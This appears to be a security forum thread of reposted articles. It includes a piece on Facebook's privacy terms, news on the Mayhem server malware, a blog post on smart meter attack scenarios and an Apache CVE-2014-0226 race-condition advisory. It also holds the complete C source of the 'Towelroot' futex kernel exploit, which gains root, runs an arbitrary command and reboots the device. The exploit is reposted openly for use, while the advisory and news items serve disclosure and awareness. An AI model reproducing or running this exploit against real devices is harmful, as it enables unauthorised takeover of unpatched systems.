Facebook? TechCrunch spotlighted Facebook's new tracking feature, "Nearby Friends," which is being pitched as an opt-in way to find out which of your friends is located within a mile of you. While you don't receive the exact location of your friends, Facebook receives your exact location. The feature uses "Location Tracking" to create your "Location History." While you can clear your history and turn off the app at will, Facebook noted that it "may still receive your most recent precise location so that you can, for example, post content that's tagged with your location or find nearby places." So some amount of tracking is happening, no matter what. And it plans to use this location data to sell you things. Back when Facebook unveiled "Nearby Friends" in April, a company spokesman conceded to TechCrunch that "at this time [Nearby Friends] is not being used for advertising or marketing, but in the future it will be." It wouldn't be surprising if Facebook did, indeed, begin selling location-based data to marketers. After all, studies confirm that this advertising is very successful at convincing you to buy things. A recent U.K. study conducted by media strategy company Vizeum and direct marketing agency iProspect found that location-based advertising created an "11 percent increase in store visits among more than 172,000 people that were served adverts." This technology is only going to become more sophisticated with the rise of more location-tracking apps that can follow your movements in-store. And, yes, Facebook can use you and your data for research. They say so right... Yeah... right there. Despite that "research clause," you may have been surprised to learn that Facebook experimented on nearly 700,000 Facebook users for one week in the summer of 2012. The site manipulated their News Feeds to prioritize positive or negative content, attempting to determine if emotions spread contagiously through social networks. There was no age restriction on the data, meaning it may have involved users under 18. Cornell researchers then analyzed Facebook's data. The resulting study, published in the Proceedings of the National Academy of Sciences, found that emotional states can be transferred via social networks. Company executive Sheryl Sandberg has since apologized for the study, calling it "poorly communicated." Andrew Ledvina, a former data scientist at Facebook from early 2012 to the summer of 2013, told the Wall Street Journal that Facebook did not have an internal review board monitoring research studies conducted by the data science team. He said that the team had freedom to try nearly any test it desired, so long as it didn't interfere with the user experience. He added that the sheer mass of the experiment's subjects was at times difficult to really comprehend, numbering in the hundreds of thousands of users. As he put it, "You get a little desensitized to it." Forbes points out that the "research" part of the User Data policy was not added until May 2012, while the research was conducted in January of 2012. Facebook data is potentially available to government agencies. Facebook has spoken out about U.S. government information requests it considers unconstitutional. Facebook's Deputy General Counsel Chris Sonderby published a statement last month about the site's legal fight regarding one such search warrant, in which the government requested nearly all data on 381 Facebook users. Only 62 of those searched were charged, in a disability fraud case. He noted that, "We regularly push back on requests that are vague or overly broad." But Facebook's second Global Government Requests Report showed that when the U.S. government asks, Facebook hands over at least some user data in more than 80 percent of cases: And if you actually think you know what you've agreed to, remember that Facebook maintains the right to change its mind about user conditions at any time. Basically, if you're still using Facebook, you're agreeing. After the site unveiled its new, more aggressive approach to targeted advertising in June, a Facebook spokesman told the Wall Street Journal, "We routinely discuss product and policy updates with our regulators -- the FTC and the Irish DPC -- and this time is no different. While we are not required to notify nor seek approval from regulators before we make changes, we do keep them informed and answer any questions they may have." It's clear that the meaning of privacy is changing drastically in the digital age. While Facebook may be one of the agents of change in drafting a new definition, it's certainly not the only one. As standards of privacy continue to morph, knowledge remains your best weapon in protecting yourself and your information. We recommend checking out the documentary "Terms And Conditions May Apply" for an in-depth look at privacy in the digital age. Common Sense Media also offers helpful guidelines for protecting your and your children's privacy online. Sursa: Didn't Read Facebook's Fine Print? Here's Exactly What It Says
  8. Nytro
    Manic malware Mayhem spreads through Linux, FreeBSD web servers And how Google could cripple infection rate in a second By Iain Thomson, 18 Jul 2014 Malware dubbed Mayhem is spreading through Linux and FreeBSD web servers, researchers say. The software nasty uses a grab bag of plugins to cause mischief, and infects systems that are not up to date with security patches. Andrej Kovalev, Konstantin Ostrashkevich and Evgeny Sidorov, who work at Russian internet portal Yandex, discovered the malware targeting *nix servers. They traced transmissions from compromised computers to two command and control (C&C) servers. So far they have found 1,400 machines that have fallen to the code, with potentially thousands more to come. "In the *nix world, autoupdate technologies aren't widely used, especially in comparison with desktops and smartphones. The vast majority of web masters and system administrators have to update their software manually and test that their infrastructure works correctly," the trio wrote in a technical report for Virus Bulletin. "For ordinary websites, serious maintenance is quite expensive and often webmasters don't have an opportunity to do it. This means it is easy for hackers to find vulnerable web servers and to use such servers in their botnets." Mayhem spreads by finding servers hosting websites with a remote file inclusion (RFI) vulnerability – it even uses Google's /humans.txt to test for this. If the ad giant rewrote this file, specifically changing the words "we can shake", Mayhem infections would be slowed – until its rfiscan.so plugin is updated. Once the malware exploits an RFI, or some other weakness, to run a PHP script on a victim, it drops a shared object called libworker.so onto the infected system and pings its C&C servers. It then creates a hidden file system, usually called sd0, and downloads eight plugins, none of which were picked up by the VirusTotal malware scanning tool. These include a couple of brute-force password crackers targeting FTP, Wordpress and Joomla accounts – presumably to spread the malware further – and information-gathering web crawlers, one of which hunts for other sites with RFI holes. Some of the vulnerable web applications Mayhem scans for ... click for slightly larger version (Credit: Kovalev, Otrashkevich, Sidorov) The Yandex trio warn there may be other plugins in circulation, based on data found on the two cracked C&C servers. These include a tool specifically to exploit systems that haven't patched the Heartbleed vulnerability in OpenSSL. The team notes that the Mayhem code does bear several similarities to the Trololo_mod and Effusion families of malware, which target Apache and Nginx servers respectively. They recommend system administrators check their servers to make sure Mayhem's spread is limited. ® Sursa: Manic malware Mayhem spreads through Linux, FreeBSD web servers • The Register
  9. Nytro
    Smart Meter Attack Scenarios 12:51 am (UTC-7) | by Rainer Link (Senior Threat Researcher) In our previous post, we looked at how smart meters were being introduced across multiple countries and regions, and why these devices pose security risks to their users. At their heart, a smart meter is simply… a computer. Let’s look at our existing computers – whether they are PCs, smartphones, tablets, or embedded devices. Similarly, these smart meters are communicating via understood technologies: cellular connectivity, power-line networking, or the user’s own Internet connection. With that in mind, we have to consider the possible threats – what could happen if a smart meter is compromised? Similarly, what are the problems that could result if the connectivity of a smart meter is disrupted? Let us see. Perhaps the most obvious risk is simple: meter tampering. If a smart meter can be hacked, inaccurate information can be sent back to the utility, allowing an to adjust the reading and resulting in an inflated bill. Let’s say, for example, that you have an argument with your neighbor. In revenge, if he can access your smart meter, you might see a rather large electric bill. Of course, the bill can also change in the opposite direction. Let’s say you’re engaged in certain activities that require high levels of electricity… altcoin mining, for example. The biggest running cost for such an operation would be the electric bill. The smart meter could be hacked to have a lower reading – or, perhaps, in a location with time-varying electric rates, to make it look like the electricity was used at off-peak times? What are some other threats at the local, “retail” level when it comes to smart meters? Crime gangs (with smarts) may well find uses for smart meters too. Power savings are frequently promoted as a benefit of smart meter. However, power consumption is also a good way of checking if someone is in a home or not. Let’s say that a vulnerability made it easy for somebody other than the homeowner or the utility to see what the power usage was. (It could be as easy as a poorly-designed API, mobile app, or website.) The smart meter would then essentially become a giant “please rob me” sign for properly equipped thieves. Alternately, if that smart meter can be controlled remotely, you now have an excellent way to carry out extortion. Such a nice house you have there, it’d be shame if anything bad happened to its power… The connectivity of the smart meters can also be a security risk. Some meters use the cellular network to provide the connection to the main servers of their utility. The utility would, of course, be paying for the bills of these meters. A truly determined person could abuse this “free” phone to make calls, send text messages, even connect to the Internet. Alternately, the smart meter may use the same Internet connection as the home. This represents a potential risk: if somebody was able to hack the smart meter from the outside, then that attacker would have access to the house’s internal network. This would put your own internal network at risk of attack; it would be as dangerous as letting anyone connect to your home network. None of the above attacks are inevitable. You can build defenses against all of them. However, it is inevitable that somewhere, somehow, the defenses will fail. These attacks are possible, and we will have to figure out how to defend against them, especially once smart meters become more prevalent. All of the attacks I discussed above are essentially small-scale, however. What happens when you look at the security of not just individual meters, but the smart grid as a whole? That’s what we will discuss in the third post in this three-part series on smart meters and smart grids. Sursa: Smart Meter Attack Scenarios | Security Intelligence Blog | Trend Micro
  10. Nytro
    /* getroot 2014/07/12 */ /* * Copyright © 2014 CUBE * * This program is free software: you can redistribute it and/or modify * it under the terms of the GNU General Public License as published by * the Free Software Foundation, either version 3 of the License, or * (at your option) any later version. * * This program is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * GNU General Public License for more details. * * You should have received a copy of the GNU General Public License * along with this program. If not, see <http://www.gnu.org/licenses/>. * */ #include <stdio.h> #include <stdlib.h> #include <sys/socket.h> #include <arpa/inet.h> #include <pthread.h> #include <sys/mman.h> #include <sys/syscall.h> #include <linux/futex.h> #include <sys/resource.h> #include <string.h> #include <fcntl.h> #define FUTEX_WAIT_REQUEUE_PI 11 #define FUTEX_CMP_REQUEUE_PI 12 struct mmsghdr { struct msghdr msg_hdr; unsigned int msg_len; }; //rodata const char str_ffffffff[] = {0xff, 0xff, 0xff, 0xff, 0}; const char str_1[] = {1, 0, 0, 0, 0}; //bss int _swag = 0; int _swag2 = 0; unsigned long HACKS_final_stack_base = 0; pid_t waiter_thread_tid; pthread_mutex_t done_lock; pthread_cond_t done; pthread_mutex_t is_thread_desched_lock; pthread_cond_t is_thread_desched; int do_socket_tid_read = 0; int did_socket_tid_read = 0; int do_splice_tid_read = 0; int did_splice_tid_read = 0; int do_dm_tid_read = 0; int did_dm_tid_read = 0; pthread_mutex_t is_thread_awake_lock; pthread_cond_t is_thread_awake; int HACKS_fdm = 0; unsigned long MAGIC = 0; unsigned long MAGIC_ALT = 0; pthread_mutex_t *is_kernel_writing; pid_t last_tid = 0; int g_argc; char rootcmd[256]; ssize_t read_pipe(void *writebuf, void *readbuf, size_t count) { int pipefd[2]; ssize_t len; pipe(pipefd); len = write(pipefd[1], writebuf, count); if (len != count) { printf("FAILED READ @ %p : %d %d\n", writebuf, (int)len, errno); while (1) { sleep(10); } } read(pipefd[0], readbuf, count); close(pipefd[0]); close(pipefd[1]); return len; } ssize_t write_pipe(void *readbuf, void *writebuf, size_t count) { int pipefd[2]; ssize_t len; pipe(pipefd); write(pipefd[1], writebuf, count); len = read(pipefd[0], readbuf, count); if (len != count) { printf("FAILED WRITE @ %p : %d %d\n", readbuf, (int)len, errno); while (1) { sleep(10); } } close(pipefd[0]); close(pipefd[1]); return len; } void write_kernel(int signum) { char *slavename; int pipefd[2]; char readbuf[0x100]; unsigned long stackbuf[4]; unsigned long buf_a[0x100]; unsigned long val1; unsigned long buf_b[0x40]; unsigned long val2; unsigned long buf_c[6]; pid_t pid; int i; int ret; pthread_mutex_lock(&is_thread_awake_lock); pthread_cond_signal(&is_thread_awake); pthread_mutex_unlock(&is_thread_awake_lock); if (HACKS_final_stack_base == 0) { printf("cpid1 resumed.\n"); pthread_mutex_lock(is_kernel_writing); HACKS_fdm = open("/dev/ptmx", O_RDWR); unlockpt(HACKS_fdm); slavename = ptsname(HACKS_fdm); open(slavename, O_RDWR); do_splice_tid_read = 1; while (1) { if (did_splice_tid_read != 0) { break; } } read(HACKS_fdm, readbuf, 0x100); write_pipe((void *)(HACKS_final_stack_base + 8), (void *)str_ffffffff, 4); pthread_mutex_unlock(is_kernel_writing); while (1) { sleep(10); } } printf("cpid3 resumed.\n"); pthread_mutex_lock(is_kernel_writing); printf("hack.\n"); read_pipe((void *)HACKS_final_stack_base, stackbuf, 0x10); read_pipe((void *)(stackbuf[3]), buf_a, 0x400); val1 = 0; val2 = 0; pid = 0; for (i = 0; i < 0x100; i++) { if (buf_a == buf_a[i + 1]) { if (buf_a > 0xc0000000) { if (buf_a[i + 2] == buf_a[i + 3]) { if (buf_a[i + 2] > 0xc0000000) { if (buf_a[i + 4] == buf_a[i + 5]) { if (buf_a[i + 4] > 0xc0000000) { if (buf_a[i + 6] == buf_a[i + 7]) { if (buf_a[i + 6] > 0xc0000000) { val1 = buf_a[i + 7]; break; } } } } } } } } } read_pipe((void *)val1, buf_b, 0x100); val2 = buf_b[0x16]; if (val2 > 0xc0000000) { if (val2 < 0xffff0000) { read_pipe((void *)val2, buf_c, 0x18); if (buf_c[0] != 0) { if (buf_c[1] != 0) { if (buf_c[2] == 0) { if (buf_c[3] == 0) { if (buf_c[4] == 0) { if (buf_c[5] == 0) { buf_c[0] = 1; buf_c[1] = 1; write_pipe((void *)val2, buf_c, 0x18); } } } } } } } } buf_b[1] = 0; buf_b[2] = 0; buf_b[3] = 0; buf_b[4] = 0; buf_b[5] = 0; buf_b[6] = 0; buf_b[7] = 0; buf_b[8] = 0; buf_b[10] = 0xffffffff; buf_b[11] = 0xffffffff; buf_b[12] = 0xffffffff; buf_b[13] = 0xffffffff; buf_b[14] = 0xffffffff; buf_b[15] = 0xffffffff; buf_b[16] = 0xffffffff; buf_b[17] = 0xffffffff; write_pipe((void *)val1, buf_b, 0x48); pid = syscall(__NR_gettid); i = 0; while (1) { if (buf_a == pid) { write_pipe((void *)(stackbuf[3] + (i << 2)), (void *)str_1, 4); if (getuid() != 0) { printf("root failed.\n"); while (1) { sleep(10); } } else { break; } } i++; } //rooted sleep(1); if (g_argc >= 2) { system(rootcmd); } system("/system/bin/touch /dev/rooted"); pid = fork(); if (pid == 0) { while (1) { ret = access("/dev/rooted", F_OK); if (ret >= 0) { break; } } printf("wait 10 seconds...\n"); sleep(10); printf("rebooting...\n"); sleep(1); system("reboot"); while (1) { sleep(10); } } pthread_mutex_lock(&done_lock); pthread_cond_signal(&done); pthread_mutex_unlock(&done_lock); while (1) { sleep(10); } return; } void *make_action(void *arg) { int prio; struct sigaction act; int ret; prio = (int)arg; last_tid = syscall(__NR_gettid); pthread_mutex_lock(&is_thread_desched_lock); pthread_cond_signal(&is_thread_desched); act.sa_handler = write_kernel; act.sa_mask = 0; act.sa_flags = 0; act.sa_restorer = NULL; sigaction(12, &act, NULL); setpriority(PRIO_PROCESS, 0, prio); pthread_mutex_unlock(&is_thread_desched_lock); do_dm_tid_read = 1; while (1) { if (did_dm_tid_read != 0) { break; } } ret = syscall(__NR_futex, &_swag2, FUTEX_LOCK_PI, 1, 0, NULL, 0); printf("futex dm: %d\n", ret); while (1) { sleep(10); } return NULL; } pid_t wake_actionthread(int prio) { pthread_t th4; pid_t pid; char filename[256]; FILE *fp; char filebuf[0x1000]; char *pdest; int vcscnt, vcscnt2; do_dm_tid_read = 0; did_dm_tid_read = 0; pthread_mutex_lock(&is_thread_desched_lock); pthread_create(&th4, 0, make_action, (void *)prio); pthread_cond_wait(&is_thread_desched, &is_thread_desched_lock); pid = last_tid; sprintf(filename, "/proc/self/task/%d/status", pid); fp = fopen(filename, "rb"); if (fp == 0) { vcscnt = -1; } else { fread(filebuf, 1, 0x1000, fp); pdest = strstr(filebuf, "voluntary_ctxt_switches"); pdest += 0x19; vcscnt = atoi(pdest); fclose(fp); } while (1) { if (do_dm_tid_read != 0) { break; } usleep(10); } did_dm_tid_read = 1; while (1) { sprintf(filename, "/proc/self/task/%d/status", pid); fp = fopen(filename, "rb"); if (fp == 0) { vcscnt2 = -1; } else { fread(filebuf, 1, 0x1000, fp); pdest = strstr(filebuf, "voluntary_ctxt_switches"); pdest += 0x19; vcscnt2 = atoi(pdest); fclose(fp); } if (vcscnt2 == vcscnt + 1) { break; } usleep(10); } pthread_mutex_unlock(&is_thread_desched_lock); return pid; } int make_socket() { int sockfd; struct sockaddr_in addr = {0}; int ret; int sock_buf_size; sockfd = socket(AF_INET, SOCK_STREAM, SOL_TCP); if (sockfd < 0) { printf("socket failed.\n"); usleep(10); } else { addr.sin_family = AF_INET; addr.sin_port = htons(5551); addr.sin_addr.s_addr = htonl(INADDR_LOOPBACK); } while (1) { ret = connect(sockfd, (struct sockaddr *)&addr, 16); if (ret >= 0) { break; } usleep(10); } sock_buf_size = 1; setsockopt(sockfd, SOL_SOCKET, SO_SNDBUF, (char *)&sock_buf_size, sizeof(sock_buf_size)); return sockfd; } void *send_magicmsg(void *arg) { int sockfd; struct mmsghdr msgvec[1]; struct iovec msg_iov[8]; unsigned long databuf[0x20]; int i; int ret; waiter_thread_tid = syscall(__NR_gettid); setpriority(PRIO_PROCESS, 0, 12); sockfd = make_socket(); for (i = 0; i < 0x20; i++) { databuf = MAGIC; } for (i = 0; i < 8; i++) { msg_iov.iov_base = (void *)MAGIC; msg_iov.iov_len = 0x10; } msgvec[0].msg_hdr.msg_name = databuf; msgvec[0].msg_hdr.msg_namelen = 0x80; msgvec[0].msg_hdr.msg_iov = msg_iov; msgvec[0].msg_hdr.msg_iovlen = 8; msgvec[0].msg_hdr.msg_control = databuf; msgvec[0].msg_hdr.msg_controllen = 0x20; msgvec[0].msg_hdr.msg_flags = 0; msgvec[0].msg_len = 0; syscall(__NR_futex, &_swag, FUTEX_WAIT_REQUEUE_PI, 0, 0, &_swag2, 0); do_socket_tid_read = 1; while (1) { if (did_socket_tid_read != 0) { break; } } ret = 0; while (1) { ret = syscall(__NR_sendmmsg, sockfd, msgvec, 1, 0); if (ret <= 0) { break; } } if (ret < 0) { perror("SOCKSHIT"); } printf("EXIT WTF\n"); while (1) { sleep(10); } return NULL; } void *search_goodnum(void *arg) { int ret; char filename[256]; FILE *fp; char filebuf[0x1000]; char *pdest; int vcscnt, vcscnt2; unsigned long magicval; pid_t pid; unsigned long goodval, goodval2; unsigned long addr, setaddr; int i; char buf[0x1000]; syscall(__NR_futex, &_swag2, FUTEX_LOCK_PI, 1, 0, NULL, 0); while (1) { ret = syscall(__NR_futex, &_swag, FUTEX_CMP_REQUEUE_PI, 1, 0, &_swag2, _swag); if (ret == 1) { break; } usleep(10); } wake_actionthread(6); wake_actionthread(7); _swag2 = 0; do_socket_tid_read = 0; did_socket_tid_read = 0; syscall(__NR_futex, &_swag2, FUTEX_CMP_REQUEUE_PI, 1, 0, &_swag2, _swag2); while (1) { if (do_socket_tid_read != 0) { break; } } sprintf(filename, "/proc/self/task/%d/status", waiter_thread_tid); fp = fopen(filename, "rb"); if (fp == 0) { vcscnt = -1; } else { fread(filebuf, 1, 0x1000, fp); pdest = strstr(filebuf, "voluntary_ctxt_switches"); pdest += 0x19; vcscnt = atoi(pdest); fclose(fp); } did_socket_tid_read = 1; while (1) { sprintf(filename, "/proc/self/task/%d/status", waiter_thread_tid); fp = fopen(filename, "rb"); if (fp == 0) { vcscnt2 = -1; } else { fread(filebuf, 1, 0x1000, fp); pdest = strstr(filebuf, "voluntary_ctxt_switches"); pdest += 0x19; vcscnt2 = atoi(pdest); fclose(fp); } if (vcscnt2 == vcscnt + 1) { break; } usleep(10); } printf("starting the dangerous things.\n"); *((unsigned long *)(MAGIC_ALT - 4)) = 0x81; *((unsigned long *)MAGIC_ALT) = MAGIC_ALT + 0x20; *((unsigned long *)(MAGIC_ALT + 8)) = MAGIC_ALT + 0x28; *((unsigned long *)(MAGIC_ALT + 0x1c)) = 0x85; *((unsigned long *)(MAGIC_ALT + 0x24)) = MAGIC_ALT; *((unsigned long *)(MAGIC_ALT + 0x2c)) = MAGIC_ALT + 8; *((unsigned long *)(MAGIC - 4)) = 0x81; *((unsigned long *)MAGIC) = MAGIC + 0x20; *((unsigned long *)(MAGIC + 8)) = MAGIC + 0x28; *((unsigned long *)(MAGIC + 0x1c)) = 0x85; *((unsigned long *)(MAGIC + 0x24)) = MAGIC; *((unsigned long *)(MAGIC + 0x2c)) = MAGIC + 8; magicval = *((unsigned long *)MAGIC); wake_actionthread(11); if (*((unsigned long *)MAGIC) == magicval) { printf("using MAGIC_ALT.\n"); MAGIC = MAGIC_ALT; } while (1) { is_kernel_writing = (pthread_mutex_t *)malloc(4); pthread_mutex_init(is_kernel_writing, NULL); *((unsigned long *)(MAGIC - 4)) = 0x81; *((unsigned long *)MAGIC) = MAGIC + 0x20; *((unsigned long *)(MAGIC + 8)) = MAGIC + 0x28; *((unsigned long *)(MAGIC + 0x1c)) = 0x85; *((unsigned long *)(MAGIC + 0x24)) = MAGIC; *((unsigned long *)(MAGIC + 0x2c)) = MAGIC + 8; pid = wake_actionthread(11); goodval = *((unsigned long *)MAGIC) & 0xffffe000; printf("%p is a good number.\n", (void *)goodval); do_splice_tid_read = 0; did_splice_tid_read = 0; pthread_mutex_lock(&is_thread_awake_lock); kill(pid, 12); pthread_cond_wait(&is_thread_awake, &is_thread_awake_lock); pthread_mutex_unlock(&is_thread_awake_lock); while (1) { if (do_splice_tid_read != 0) { break; } usleep(10); } sprintf(filename, "/proc/self/task/%d/status", pid); fp = fopen(filename, "rb"); if (fp == 0) { vcscnt = -1; } else { fread(filebuf, 1, 0x1000, fp); pdest = strstr(filebuf, "voluntary_ctxt_switches"); pdest += 0x19; vcscnt = atoi(pdest); fclose(fp); } did_splice_tid_read = 1; while (1) { sprintf(filename, "/proc/self/task/%d/status", pid); fp = fopen(filename, "rb"); if (fp == 0) { vcscnt2 = -1; } else { fread(filebuf, 1, 0x1000, fp); pdest = strstr(filebuf, "voluntary_ctxt_switches"); pdest += 19; vcscnt2 = atoi(pdest); fclose(fp); } if (vcscnt2 != vcscnt + 1) { break; } usleep(10); } goodval2 = 0; *((unsigned long *)(MAGIC - 4)) = 0x81; *((unsigned long *)MAGIC) = MAGIC + 0x20; *((unsigned long *)(MAGIC + 8)) = MAGIC + 0x28; *((unsigned long *)(MAGIC + 0x1c)) = 0x85; *((unsigned long *)(MAGIC + 0x24)) = MAGIC; *((unsigned long *)(MAGIC + 0x2c)) = MAGIC + 8; *((unsigned long *)(MAGIC + 0x24)) = goodval + 8; wake_actionthread(12); goodval2 = *((unsigned long *)(MAGIC + 0x24)); printf("%p is also a good number.\n", (void *)goodval2); for (i = 0; i < 9; i++) { *((unsigned long *)(MAGIC - 4)) = 0x81; *((unsigned long *)MAGIC) = MAGIC + 0x20; *((unsigned long *)(MAGIC + 8)) = MAGIC + 0x28; *((unsigned long *)(MAGIC + 0x1c)) = 0x85; *((unsigned long *)(MAGIC + 0x24)) = MAGIC; *((unsigned long *)(MAGIC + 0x2c)) = MAGIC + 8; pid = wake_actionthread(10); if (*((unsigned long *)MAGIC) < goodval2) { HACKS_final_stack_base = *((unsigned long *)MAGIC) & 0xffffe000; pthread_mutex_lock(&is_thread_awake_lock); kill(pid, 12); pthread_cond_wait(&is_thread_awake, &is_thread_awake_lock); pthread_mutex_unlock(&is_thread_awake_lock); write(HACKS_fdm, buf, 0x1000); while (1) { sleep(10); } } } } return NULL; } void *accept_socket(void *arg) { int sockfd; int yes; struct sockaddr_in addr = {0}; int ret; sockfd = socket(AF_INET, SOCK_STREAM, SOL_TCP); yes = 1; setsockopt(sockfd, SOL_SOCKET, SO_REUSEADDR, (char *)&yes, sizeof(yes)); addr.sin_family = AF_INET; addr.sin_port = htons(5551); addr.sin_addr.s_addr = htonl(INADDR_LOOPBACK); bind(sockfd, (struct sockaddr *)&addr, sizeof(addr)); listen(sockfd, 1); while(1) { ret = accept(sockfd, NULL, NULL); if (ret < 0) { printf("**** SOCK_PROC failed ****\n"); while(1) { sleep(10); } } else { printf("i have a client like hookers.\n"); } } return NULL; } void init_exploit() { unsigned long addr; pthread_t th1, th2, th3; printf("running with pid %d\n", getpid()); pthread_create(&th1, NULL, accept_socket, NULL); addr = (unsigned long)mmap((void *)0xa0000000, 0x110000, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_SHARED | MAP_FIXED | MAP_ANONYMOUS, -1, 0); addr += 0x800; MAGIC = addr; if ((long)addr >= 0) { printf("first mmap failed?\n"); while (1) { sleep(10); } } addr = (unsigned long)mmap((void *)0x100000, 0x110000, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_SHARED | MAP_FIXED | MAP_ANONYMOUS, -1, 0); addr += 0x800; MAGIC_ALT = addr; if (addr > 0x110000) { printf("second mmap failed?\n"); while (1) { sleep(10); } } pthread_mutex_lock(&done_lock); pthread_create(&th2, NULL, search_goodnum, NULL); pthread_create(&th3, NULL, send_magicmsg, NULL); pthread_cond_wait(&done, &done_lock); return; } int main(int argc, char **argv) { g_argc = argc; if (argc >= 2) { strcpy(rootcmd, argv[1]); } init_exploit(); printf("\n"); printf("done root command.\n"); while (1) { sleep(10); } return 0; } Sursa: [C] Toweelroot - Pastebin.com
  11. Nytro
    Apache HTTPd - description of the CVE-2014-0226. From: funky.koval () hushmail com Date: Mon, 21 Jul 2014 08:55:19 +0000 Hi there, --[ 0. Sparse summary Race condition between updating httpd's "scoreboard" and mod_status, leading to several critical scenarios like heap buffer overflow with user supplied payload and leaking heap which can leak critical memory containing htaccess credentials, ssl certificates private keys and so on. --[ 1. Prerequisites Apache httpd compiled with MPM event or MPM worker. The tested version was 2.4.7 compiled with: ./configure --enable-mods-shared=reallyall --with-included-apr The tested mod_status configuration in httpd.conf was: SetHandler server-status ExtendedStatus On --[ 2. Race Condition Function ap_escape_logitem in server/util.c looks as follows: 1908AP_DECLARE(char *) ap_escape_logitem(apr_pool_t *p, const char *str) 1909{ 1910 char *ret; 1911 unsigned char *d; 1912 const unsigned char *s; 1913 apr_size_t length, escapes = 0; 1914 1915 if (!str) { 1916 return NULL; 1917 } 1918 1919 /* Compute how many characters need to be escaped */ 1920 s = (const unsigned char *)str; 1921 for (; *s; ++s) { 1922 if (TEST_CHAR(*s, T_ESCAPE_LOGITEM)) { 1923 escapes++; 1924 } 1925 } 1926 1927 /* Compute the length of the input string, including NULL */ 1928 length = s - (const unsigned char *)str + 1; 1929 1930 /* Fast path: nothing to escape */ 1931 if (escapes == 0) { 1932 return apr_pmemdup(p, str, length); 1933 } In the for-loop between 1921 and 1925 lines function is computing the length of supplied str (almost like strlen, but additionally it counts special characters which need to be escaped). As comment in 1927 value says, function computes count of bytes to copy. If there's nothing to escape function uses apr_pmemdup to duplicate the str. In our single-threaded mind everything looks good, but tricky part starts when we introduce multi-threading. Apache in MPM mode runs workers as threads, let's consider the following scenario: 1) ap_escape_logitem(pool, "") is called 2) for-loop in 1921 line immediately escapes, because *s is in first loop run 3) malicious thread change memory under *s to another value (something which is not ) 4) apr_pmemdup copies that change value to new string and returns it Output from the ap_escape_logitem is considered to be a string, if scenario above would occur, then returned string would not be zeroed at the end, which may be harmful. The mod_status code looks as follows: 833 ap_rprintf(r, "%s%s" 834 "%snn", 835 ap_escape_html(r->pool, 836 ws_record->client), 837 ap_escape_html(r->pool, 838 ws_record->vhost), 839 ap_escape_html(r->pool, 840 ap_escape_logitem(r->pool, 841 ws_record->request))); The relevant call to ap_escape_html() is at line 839 after the evaluation of ap_escape_logitem(). The first argument passed to the ap_escape_logitem() is in fact an apr pool associated with the HTTP request and defined in the request_rec structure. This code is a part of a larger for-loop where code is iterating over worker_score structs which is defined as follows: 90struct worker_score { 91#if APR_HAS_THREADS 92 apr_os_thread_t tid; 93#endif 94 int thread_num; 95 /* With some MPMs (e.g., worker), a worker_score can represent 96 * a thread in a terminating process which is no longer 97 * represented by the corresponding process_score. These MPMs 98 * should set pid and generation fields in the worker_score. 99 */ 100 pid_t pid; 101 ap_generation_t generation; 102 unsigned char status; 103 unsigned short conn_count; 104 apr_off_t conn_bytes; 105 unsigned long access_count; 106 apr_off_t bytes_served; 107 unsigned long my_access_count; 108 apr_off_t my_bytes_served; 109 apr_time_t start_time; 110 apr_time_t stop_time; 111 apr_time_t last_used; 112#ifdef HAVE_TIMES 113 struct tms times; 114#endif 115 char client[40]; /* Keep 'em small... but large enough to hold an IPv6 address */ 116 char request[64]; /* We just want an idea... */ 117 char vhost[32]; /* What virtual host is being accessed? */ 118}; The 'request' field in a worker_score structure is particularly interesting - this field can be changed inside the copy_request function, which is called by the update_child_status_internal. This change may occur when the mod_status is iterating over the workers at the same time the ap_escape_logitem is called within a different thread, leading to a race condition. We can trigger this exact scenario in order to return a string without a trailing . This can be achived by running two clients, one triggering the mod_status handler and second sending random requests to the web server. Let's consider the following example: 1) the mod_status iterates over workers invoking update_child_status_internal() 2) at some point for one worker mod_status calls ap_escape_logitem(pool, ws_record->request) 3) let's asume that ws_record->request at the beginning is "" literally at the first byte. 4) inside the ap_escape_logitem function the length of the ws_record->request is computed, which is 1 (an empty string consisting of ) 5) another thread modifies ws_record->request (in fact it's called ws->request in update_child_status_internal function but it's exactly the same location in memory) and puts there i.e. "GET / HTTP/1.0" 6) the ap_pmemdup(pool, str, 1) in ap_escape_logitem copies the first one byte from "GET / HTTP/1.0" - "G" in that case and returns it. The ap_pmemdup looks as follows: 112APR_DECLARE(void *) apr_pmemdup(apr_pool_t *a, const void *m, apr_size_t n) 113{ 114 void *res; 115 116 if (m == NULL) 117 return NULL; 118 res = apr_palloc(a, n); 119 memcpy(res, m, n); 120 return res; It allocates memory using apr_palloc function which returns "ditry" memory (note that apr_pcalloc overwrite allocated memory with NULs). So it's non-deterministic what's after the copied "G" byte. There might be or might be not. For now let's assume that the memory allocated by apr_palloc was dirty (containing random bytes). 7) ap_escape_logitem returns "G....." .junk. "" The value from the example above is then pushed to the ap_escape_html2 function which is also declared in util.c: 1860AP_DECLARE(char *) ap_escape_html2(apr_pool_t *p, const char *s, int toasc) 1861{ 1862 int i, j; 1863 char *x; 1864 1865 /* first, count the number of extra characters */ 1866 for (i = 0, j = 0; s[i] != ''; i++) 1867 if (s[i] == '') 1868 j += 3; 1869 else if (s[i] == '&') 1870 j += 4; 1871 else if (s[i] == '"') 1872 j += 5; 1873 else if (toasc && !apr_isascii(s[i])) 1874 j += 5; 1875 1876 if (j == 0) 1877 return apr_pstrmemdup(p, s, i); 1878 1879 x = apr_palloc(p, i + j + 1); 1880 for (i = 0, j = 0; s[i] != ''; i++, j++) 1881 if (s[i] == '') { 1886 memcpy(&x[j], ">", 4); 1887 j += 3; 1888 } 1889 else if (s[i] == '&') { 1890 memcpy(&x[j], "&", 5); 1891 j += 4; 1892 } 1893 else if (s[i] == '"') { 1894 memcpy(&x[j], """, 6); 1895 j += 5; 1896 } 1897 else if (toasc && !apr_isascii(s[i])) { 1898 char *esc = apr_psprintf(p, "%3.3d;", (unsigned char)s[i]); 1899 memcpy(&x[j], esc, 6); 1900 j += 5; 1901 } 1902 else 1903 x[j] = s[i]; 1904 1905 x[j] = ''; 1906 return x; 1907} If the string from the example above would be passed to this function we should get the following code-flow: 1) in the for-loop started in line 1866 we count the length of escaped string 2) because 's' string contains junk (due to only one byte being allocated by the apr_palloc function), it may contain '>' character. Let's assume that this is our case 3) after for-loop in 1866 line 'j' is greater than 0 (at least one s[i] equals '>' as assumed above 4) in the 1879 line memory for escaped 'd' string is allocated 5) for-loop started in line 1880 